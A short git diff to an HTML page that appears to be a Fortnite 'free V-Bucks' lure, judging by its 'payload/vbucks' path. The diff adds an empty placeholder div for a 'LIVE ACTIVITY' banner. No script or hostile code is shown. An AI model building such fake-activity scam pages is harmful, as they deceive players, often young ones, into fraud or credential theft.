--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -115,7 +115,8 @@
                         <div class="col-lg-12 sticky-alert">
                            <p style="font-family: fortnite; font-size: 25px; margin-bottom: 0px;">LIVE ACTIVITY</p>
                            <p></p>
-
+                           <div id="fortnite-sticky" class="fortnite-sticky">
+                           </div>
                         </div>
                      </div>
                   </div>
